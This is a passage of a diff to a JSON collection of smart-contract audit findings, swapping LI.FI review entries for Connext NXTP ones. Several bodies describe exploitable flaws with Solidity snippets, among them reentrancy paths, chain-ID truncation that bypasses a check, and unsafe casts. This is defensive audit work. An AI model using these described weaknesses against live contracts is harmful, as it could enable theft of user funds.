ServiceFeeCollector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The contract ServiceFeeCollector has several functions that collect fees and are permissionless. This could result in spam events, which might confuse the processing of the events. function collectTokenGasFees(...) ... { ... emit GasFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeGasFees(...) ... { ... emit GasFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } function collectTokenInsuranceFees(...) ... { ... emit InsuranceFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeInsuranceFees(...) ... { ...
emit InsuranceFeesCollected(LibAsset.NULL_ADDRESS,receiver,feeAmount); }", + "title": "RouterPermissionsManagerInfo can be packed differently for readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "RouterPermissionsManagerInfo has multiple fields that are each a mapping of address to a different value. The address here represents a liquidity router address. It would be more readable to pack these values such that only one mapping is used. This would also indicate how all these mappings have the same shared key, which is the router.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Function depositAsset() allows 0 amount of native assets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function depositAsset() disallows amount == 0 for ERC20, however it does allow amount == 0 for native assets. function depositAsset(address assetId, uint256 amount) internal { if (isNativeAsset(assetId)) { if (msg.value < amount) revert InvalidAmount(); } else { if (amount == 0) revert InvalidAmount(); ... } }", + "title": "Consolidate TokenId struct into a file that can be imported in relevant files", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "TokenId struct is defined both in BridgeMessage and LibConnextStorage with the same structure/fields. If one struct needs to be updated in the future, the other one must be updated in parallel.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Inadequate expiration time check in ThorSwapFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "According to Thorchain, the expiration time for certain operations should be set to +60 minutes. However, there is currently no check in place to enforce this requirement. This oversight may lead to users inadvertently setting incorrect expiration times, potentially causing unexpected behavior or issues within the ThorSwapFacet.", + "title": "Typos, grammatical and styling errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There are a few typos and grammatical mistakes that can be corrected in the codebase.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Insufficient validation of bridgedTokenSymbol and sendingAssetId", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "During the code review, it was noticed that the facet does not adequately check the correspondence between the bridgedTokenSymbol and sendingAssetId parameters.
This oversight could allow for a random token to be sent to the Diamond, while still bridging another available token within the Diamond, even when no tokens should typically be left in the Diamond.", + "title": "Keep consistent return parameters in calculateSwapToLocalAssetIfNeeded", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "All return paths in calculateSwapToLocalAssetIfNeeded except one return _local as the 2nd return parameter. It would be best for readability and consistency to change the following code to follow the same pattern: if (_asset == _local) { return (_amount, _asset); }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Check for destinationChainId in CBridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Function _startBridge() of CBridgeFacet contains a check on destinationChainId and contains conversions to uint64. If both block.chainid and _bridgeData.destinationChainId fit in a uint64 then the checks of modifier validateBridgeData are already sufficient. When _bridgeData.destinationChainId > type(uint64).max then this never reverts: if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); Then in the rest of the code it takes the truncated version of the destinationChainId via uint64(_bridgeData.destinationChainId), which can be any value, including block.chainid. So you can still bridge to the same chain. function _startBridge(ILiFi.BridgeData memory _bridgeData,CBridgeData memory _cBridgeData) private { if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); if (...) { cBridge.sendNative{ value: _bridgeData.minAmount }(... , uint64(_bridgeData.destinationChainId),...); } else { ... cBridge.send(..., uint64(_bridgeData.destinationChainId), ...); } } modifier validateBridgeData(ILiFi.BridgeData memory _bridgeData) { ... if (_bridgeData.destinationChainId == block.chainid) { revert CannotBridgeToSameNetwork(); } ... }", + "title": "Fix/add or complete missing NatSpec comments.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Some NatSpec comments are either missing or are incomplete.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Absence of nonReentrant in HopFacetOptimized facet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "HopFacetOptimized is a facet-based smart contract implementation that aims to optimize gas usage and streamline the execution of certain functions. It doesn't have the checks that other facets have: nonReentrant refundExcessNative(payable(msg.sender)) containsSourceSwaps(_bridgeData) doesNotContainDestinationCalls(_bridgeData) validateBridgeData(_bridgeData) Most missing checks are done on purpose to save gas. However, the most important check is the nonReentrant modifier. In several places in the Diamond it is possible to trigger a reentrant call, for example via ERC777 tokens, custom tokens, or native token transfers.
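For reference, a minimal sketch of the guard that the missing nonReentrant modifier would provide (patterned after OpenZeppelin's ReentrancyGuard; illustrative, not the project's code):

pragma solidity ^0.8.17;

abstract contract MinimalReentrancyGuard {
    uint256 private _status = 1; // 1 = not entered, 2 = entered

    modifier nonReentrant() {
        // A reentrant call arrives while _status is still 2 and reverts here.
        require(_status == 1, \"reentrant call\");
        _status = 2;
        _;
        _status = 1;
    }
}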
In combination with the complexity of the code and the power of ERC20Proxy.sol it is difficult to make sure no attacks can occur.", + "title": "Define and use constants for different literals used in the codebase.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Throughout the project, a few literals have been used. It would be best to define a named constant for those. That way the purpose of those values would be clearer, and the common literals can be consolidated into one place.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Revert for excessive approvals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Certain tokens, such as UNI and COMP, revert if the value passed to an approval or transfer surpasses uint96. Both aforementioned tokens possess unique logic in their approval process that sets the allowance to the maximum value of uint96 when the approval amount equals uint256(-1). Note: Hop currently doesn't support these tokens, so this is set to low risk.", + "title": "Enforce using adopted for the returned parameter in swapFromLocalAssetIfNeeded... for consistency.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The other return paths in swapFromLocalAssetIfNeeded, swapFromLocalAssetIfNeededForExactOut and calculateSwapFromLocalAssetIfNeeded use the adopted parameter as one of the return value components. It would be best to have all the return paths do the same thing. Note swapFromLocalAssetIfNeeded and calculateSwapFromLocalAssetIfNeeded should always return (_, adopted) and swapFromLocalAssetIfNeededForExactOut should always return (_, _, adopted).", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Inconsistent transaction failure/stuck due to missing validation of global fixed native fee rate and execution fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The current implementation of the facet logic does not validate the global fixed native fee rate and execution fee, which can lead to inconsistent transaction failures or getting stuck in the process. This issue can arise when the fee rate is not set correctly or there are discrepancies between the fee rate used in the smart contract and the actual fee rate. This can result in transactions getting rejected or stuck, causing inconvenience to users and affecting the overall user experience.", + "title": "Use interface types for parameters instead of casting to the interface type multiple times", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Sometimes casting to the interface type has been performed multiple times.
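As an illustration of the pattern (a hypothetical helper, not code from either codebase):

pragma solidity ^0.8.17;

import \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";

contract CastExample {
    // Repeated casts of the same address parameter:
    function sweepByAddress(address token, address to) external {
        IERC20(token).transfer(to, IERC20(token).balanceOf(address(this)));
    }

    // Giving the parameter the interface type removes the casts:
    function sweepByInterface(IERC20 token, address to) external {
        token.transfer(to, token.balanceOf(address(this)));
    }
}

Callers pass the same 20-byte address either way; only the static type of the parameter changes.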
It will be cleaner if the parameter is defined with that interface type, avoiding unnecessary casts.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Incorrect value emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "LibSwap.swap() emits the following: emit AssetSwapped( transactionId, _swap.callTo, _swap.sendingAssetId, _swap.receivingAssetId, _swap.fromAmount, newBalance > initialReceivingAssetBalance // toAmount ? newBalance - initialReceivingAssetBalance : newBalance, block.timestamp ); It will be difficult to interpret the value emitted for toAmount as the observer won't know which of the two values has been emitted.", + "title": "Be aware of tokens with multiple addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If a token has multiple addresses (see weird erc20) then the token cap might have an unexpected effect, especially if the two addresses have a different cap. function _addLiquidityForRouter(...) ... { ... if (s.domain == canonical.domain) { // Sanity check: caps not reached uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } } ... }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Storage slots derived from hashes are prone to pre-image attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Storage slots manually constructed using the keccak hash of a string are prone to storage slot collision as the pre-images of these hashes are known. Attackers may find a potential path to those storage slots using the keccak hash function in the codebase and some crafted payload.", + "title": "Remove old references to claims", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The contract RelayerFacet still has some references to claims. These are a residue from a previous version and are not used currently. error RelayerFacet__initiateClaim_emptyClaim(); error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds);", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Incorrect arguments compared in SquidFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "startBridgeTokensViaSquid() reverts if (_squidData.sourceCalls.length > 0) != _bridgeData.hasSourceSwaps. Here, _squidData.sourceCalls is an argument passed to Squid Router, and _bridgeData.hasSourceSwaps refers to source swaps done by SquidFacet.
Ideally, _bridgeData.hasSourceSwaps should be false for this function (though it's not enforced), which means _squidData.sourceCalls.length has to be 0 for it to successfully execute.", + "title": "Doublecheck references to Nomad", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The code refers to nomad several times in a way that is currently not accurate. This could be confusing to the maintainers and readers of the code. This includes the following examples: BridgeFacet.sol:419: * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad BridgeFacet.sol:423: * assets will be swapped for their local nomad asset counterparts (i.e. bridgeable tokens) via the configured AMM if BridgeFacet.sol:424: * necessary. In the event that the adopted assets *are* local nomad assets, no swap is needed. The local tokens will InboxFacet.sol:87: * @notice Only accept messages from an Nomad Replica contract. RoutersFacet.sol:533: * @param _local - The address of the nomad representation of the asset AssetLogic.sol:102: * @notice Swaps an adopted asset to the local (representation or canonical) nomad asset. AssetLogic.sol:139: * @notice Swaps a local nomad asset for the adopted asset using the stored stable swap AssetLogic.sol:185: * @notice Swaps a local nomad asset for the adopted asset using the stored stable swap AssetLogic.sol:336: * @notice Calculate amount of tokens you receive on a local nomad asset for the adopted asset AssetLogic.sol:375: * @notice Calculate amount of tokens you receive of a local nomad asset for the adopted asset LibConnextStorage.sol:54: * @param receiveLocal - If true, will use the local nomad asset on the destination instead of adopted. LibConnextStorage.sol:148: * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> madUSDC on polygon). LibConnextStorage.sol:204: * this domain (the nomad local asset). LibConnextStorage.sol:268: * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> madUSDC on polygon) ConnectorManager.sol:11: * @dev Each nomad router contract has a `XappConnectionClient`, which references a", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unsafe casting of bridge amount from uint256 to uint128", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The issue with the code is that it performs an unsafe cast from a uint256 value to a uint128 value in the call to the initiateTeleport() function. The _bridgeData.minAmount parameter passed to this function is of type uint256, but it is cast to uint128 without any checks, which may result in a loss of precision or even an overflow. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), address(teleportGateway), _bridgeData.minAmount ); teleportGateway.initiateTeleport( l1Domain, _bridgeData.receiver, uint128(_bridgeData.minAmount) );", + "title": "Document usage of Nomad domain schema", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The library LibConnextStorage specifies that the domains are compatible with the nomad domain schema. However, other locations don't mention this.
This is especially important during the enrollment of new domains. * @param originDomain - The originating domain (i.e. where `xcall` is called). Must match nomad domain schema * @param destinationDomain - The final domain (i.e. where `execute` / `reconcile` are called). Must match nomad domain schema struct TransferInfo { uint32 originDomain; uint32 destinationDomain; ... }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Cache s.anyTokenAddresses[_bridgeData.sendingAssetId]", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of MultichainFacet contains the following expression. This retrieves the value for s.anyTokenAddresses[_bridgeData.sendingAssetId] twice. It might save some gas to first store this in a tmp variable. s.anyTokenAddresses[_bridgeData.sendingAssetId] != address(0) ? s.anyTokenAddresses[_bridgeData.sendingAssetId]: ...", + "title": "Router has multiple meanings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The term router is used for three different concepts. This is confusing for maintainers and readers of the code: A) The router that provides liquidity and signs bids * `router` - this is the address that will sign bids sent to the sequencer B) The router that can add new routers of type A (B is a role and the address could be a multisig) /// @notice Enum representing address role enum Role { None, Router, Watcher, Admin } C) The router that previously was the BridgeRouter or xApp Router: * @param _router The address of the potential remote xApp Router", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "DeBridgeFacet permit seems unusable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function deBridgeGate.send() takes a parameter permit. This can only be used if it's signed by the Diamond, see DeBridgeGate.sol#L654-L662. As there is no code to let the Diamond sign a permit, this function doesn't seem usable. function _startBridge(...) ... { ... deBridgeGate.send{ value: nativeAssetAmount }(..., _deBridgeData.permit, ...); ... }", + "title": "Robustness of receiving contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the _reconciled branch of the code, the functions _handleExecuteTransaction(), _executeCalldata() and excessivelySafeCall() don't revert when the underlying call reverts. This seems to be intentional. This underlying revert can happen if there is a bug in the underlying call or if insufficient gas is supplied by the relayer. Note: if a delegate address is specified it can retry the call to try and fix temporary issues. The receiving contract has already received the tokens via handleOutgoingAsset(), so it must be prepared to handle these tokens. This should be explicitly documented. function _handleExecuteTransaction(...) ... { AssetLogic.handleOutgoingAsset(_asset, _args.params.to, _amountOut); _executeCalldata(_transferId, _amountOut, _asset, _reconciled, _args.params); ... } function _executeCalldata(...) ... { if (_reconciled) { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...); } else { ...
} }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Redundant checks in CircleBridgeFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The function swapAndStartBridgeTokensViaCircleBridge() contains both noNativeAsset() and onlyAllowSourceToken(). The check noNativeAsset() is not necessary as onlyAllowSourceToken() already verifies the sendingAssetId isn't a native token. function swapAndStartBridgeTokensViaCircleBridge(...) ... { ... noNativeAsset(_bridgeData) onlyAllowSourceToken(_bridgeData, usdc) { ... } modifier noNativeAsset(ILiFi.BridgeData memory _bridgeData) { if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { revert NativeAssetNotSupported(); } _; } modifier onlyAllowSourceToken(ILiFi.BridgeData memory _bridgeData, address _token) { if (_bridgeData.sendingAssetId != _token) { revert InvalidSendingToken(); } _; }", + "title": "Functions can be combined", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both xcall and xcallIntoLocal have the same code except for the value of receiveLocal (which is set to false for xcall and true for xcallIntoLocal). Instead of having these as separate functions, a single function can be created which tweaks the functionality of xcall and xcallIntoLocal on the basis of the receiveLocal value.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Redundant check on _swapData", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "This check is not present in the majority of the facets: if (_swapData.length == 0) { revert NoSwapDataProvided(); } Ultimately, it's not required as _depositAndSwap() reverts when length is 0.", + "title": "Document source of zeroHashes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The hashes which are used in function zeroHashes() are not explained, which makes it more difficult to understand and verify the code. function zeroHashes() internal pure returns (bytes32[TREE_DEPTH] memory _zeroes) { ... // keccak256 zero hashes bytes32 internal constant Z_0 = hex\"0000000000000000000000000000000000000000000000000000000000000000\"; ... bytes32 internal constant Z_31 = hex\"8448818bb4ae4562849e949e17ac16e0be16688e156b5cf15e098c627c0056a9\"; }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Duplicate checks done", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "In highlighted cases, a check has been done multiple times at different places: validateBridgeData modifier on ArbitrumBridgeFacet. _startBridge() does checks already done by functions from which it's called. depositAsset() does some checks already done by AmarokFacet.startBridgeTokensViaAmarok().", + "title": "Document underflow/overflows in TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function index() has an overflow when _bytes == 32, and leftMask() has an underflow when _len == 0. These two compensate each other so the end result of index() is as expected.
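Tracing the compensation through the snippet quoted below: with _bytes == 32, the unchecked uint8 multiplication bitLength = _bytes * 8 wraps from 256 to 0; leftMask(0) then computes sub(0, 1), which wraps to type(uint256).max, and sar by such an oversized shift of a value with the sign bit set saturates to all ones, which happens to be exactly the correct mask for a full 32-byte read.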
As the special case for _bytes == 0 is also handled, we assume this is intentional. However, this behavior isn't mentioned in the comments, while other underflow/overflows are documented. library TypedMemView { function index( bytes29 memView, uint256 _index, uint8 _bytes ) internal pure returns (bytes32 result) { ... unchecked { uint8 bitLength = _bytes * 8; } ... } function leftMask(uint8 _len) private pure returns (uint256 mask) { ... mask := sar( sub(_len, 1), ... ... ) } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "calldata can be used instead of memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "When the incoming argument is constant, calldata can be used instead of memory to save gas on copying it to memory. This remains true for individual array elements.", + "title": "Use while loops in dequeueVerified()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Within function dequeueVerified() there are a few for loops that mention a variable as their first element. This is a null statement and can be removed. After removing, only a while condition remains. Replacing the for with a while would make the code more readable. Also (x >= y) can be replaced by (!(x < y)) or (!(y > x)) to save some gas. function dequeueVerified(Queue storage queue, uint256 delay) internal returns (bytes32[] memory) { ... for (last; last >= first; ) { ... } ... for (first; first <= last; ) { ... } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Further gas optimizations for HopFacetOptimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "For the contract HopFacetOptimized it is very important to be gas optimized. Especially on Arbitrum, it is relatively expensive due to the calldata. struct HopData { uint256 bonderFee; uint256 amountOutMin; uint256 deadline; uint256 destinationAmountOutMin; uint256 destinationDeadline; IHopBridge hopBridge; } struct BridgeData { bytes32 transactionId; string bridge; string integrator; address referrer; address sendingAssetId; address receiver; uint256 minAmount; uint256 destinationChainId; bool hasSourceSwaps; bool hasDestinationCall; } function startBridgeTokensViaHopL1ERC20( ILiFi.BridgeData calldata _bridgeData, HopData calldata _hopData ) external { // Deposit assets LibAsset.transferFromERC20(...); _hopData.hopBridge.sendToL2(...); emit LiFiTransferStarted(_bridgeData); } function transferFromERC20(...) ...
{ if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); if (to == NULL_ADDRESS) revert NoTransferToNullAddress(); IERC20 asset = IERC20(assetId); uint256 prevBalance = asset.balanceOf(to); SafeERC20.safeTransferFrom(asset, from, to, amount); if (asset.balanceOf(to) - prevBalance != amount) revert InvalidAmount(); }", + "title": "Duplicate functions in Encoding.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Encoding.sol defines a few functions already present in TypedMemView.sol: nibbleHex(), byteHex(), encodeHex().", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "payable keyword can be removed for some bridge functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "For the above highlighted functions, the native token is never forwarded to the underlying bridge. In these cases, the payable keyword and the related modifier refundExcessNative(payable(msg.sender)) can be removed to save gas.", + "title": "Document the two MerkleTreeManagers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "On the hub domain (e.g. mainnet) there are two MerkleTreeManagers, one for the hub and one for the MainnetSpokeConnector. This might not be obvious to the casual readers of the code. Accidentally confusing the two would lead to weird issues.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "AmarokData.callTo can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "AmarokFacet's final receiver can be different from _bridgeData.receiver: address receiver = _bridgeData.hasDestinationCall ? _amarokData.callTo : _bridgeData.receiver; Since both _amarokData.callTo and _bridgeData.receiver are passed by the caller, AmarokData.callTo can be removed, and _bridgeData.receiver can be assumed as the final receiver.", + "title": "Match filename to contract name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Sometimes the name of the .sol file is different from the contract name. Also, sometimes multiple contracts are defined in the same file. Additionally, there are multiple .sol files with the same name. This makes it more difficult to find the file containing the contract. File: messaging/Merkle.sol contract MerkleTreeManager is ProposedOwnableUpgradeable { ... } File: messaging/libraries/Merkle.sol library MerkleLib { ... } File: ProposedOwnable.sol abstract contract ProposedOwnable is IProposedOwnable { ... } abstract contract ProposedOwnableUpgradeable is Initializable, ProposedOwnable { ... } File: OZERC20.sol contract ERC20 is IERC20, IERC20Permit, EIP712 { ...
}", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use requiredEther variable instead of adding twice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The cost and nativeAmount are added twice to calculate the requiredEther variable, which can lead to increased gas consumption.", + "title": "Use uint40 for type in TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "All internal functions in TypedMemView use uint40 for type except build(). Since internal functions can be called by inheriting contracts, it's better to provide a consistent interface.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "refundExcessNative modifier can be gas-optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The highlighted code above can be gas-optimized by removing 1 if condition.", + "title": "Comment in function typeOf() is inaccurate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A comment in function typeOf() is inaccurate. It says it is shifting 24 bytes, however it is shifting 216 / 8 = 27 bytes. function typeOf(bytes29 memView) internal pure returns (uint40 _type) { assembly { ... // 216 == 256 - 40 _type := shr(216, memView) // shift out lower 24 bytes } }", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "BridgeData.hasSourceSwaps can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "The field hasSourceSwaps can be removed from the struct BridgeData. _swapData is enough to identify if source swaps are needed.", + "title": "Missing Natspec documentation in TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "unsafeJoin()'s Natspec documentation is incomplete as the second argument to function is not documented.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unnecessary validation argument for native token amount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "Since both msg.value and feeAmount is controlled by the caller, you can remove feeAmount as an argument and assume msg.value is what needs to be collected. This will save gas on comparing these two values and refunding the extra.", + "title": "Remove irrelevant comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": " Instance 1 - TypedMemView.sol#L770 clone() has this comment that seems to be copied from equal(). This is not applicable to clone() and can be deleted. * @dev Shortcuts if the pointers are identical, otherwise compares type and digest. Instance 2 - SpokeConnector.sol#L499 The function process of SpokeConnector contains comments that are no longer relevant. 
// check re-entrancy guard // require(entered == 1, \"!reentrant\"); // entered = 0; Instance 3 - BridgeFacet.sol#L419 Nomad is no longer used within Connext. However, it is still mentioned in the comments within the codebase. * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad * network.", "labels": [ "Spearbit", - "LIFI-retainer1", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Restrict access for cBridge refunds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", - "body": "cBridge refunds need to be triggered from the contract that sent the transaction to cBridge. This can be done using the executeCallAndWithdraw function. As the function is not cBridge specific, it can do any calls for the Diamond contract. Restricting what that function can call would allow more secure automation of refunds.", + "title": "Incorrect comment about TypedMemView encoding", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A TypedMemView variable of type bytes29 is encoded as follows: First 5 bytes encode a type flag. Next 12 bytes point to a memory address. Next 12 bytes encode the length of the memory view (in bytes). Next 3 bytes are empty. When shifting a TypedMemView variable to the right by 15 bytes (120 bits), the encoded length and the empty bytes are removed. Hence, this comment is incorrect: // 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) _loc := and(shr(120, memView), 